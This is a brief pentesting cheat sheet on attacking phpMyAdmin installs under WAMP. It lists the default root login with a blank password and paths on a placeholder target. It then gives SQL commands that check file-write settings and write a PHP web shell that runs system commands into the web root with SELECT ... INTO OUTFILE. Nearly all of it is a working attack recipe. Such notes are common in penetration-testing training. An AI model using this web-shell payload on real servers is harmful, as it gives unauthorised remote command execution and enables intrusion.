Pentesting phpMyAdmin
Default Login
Username: root
Password:WAMP Paths
http://TARGET:8080/phpmyadmin/
http://TARGET:8080/add_vhost.php?lang=englishphpMyAdmin to Webshell
SHOW VARIABLES LIKE 'secure_file_priv';
SHOW VARIABLES LIKE 'datadir';
SHOW VARIABLES LIKE 'basedir';
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\wamp\\www\\shell.php";Last updated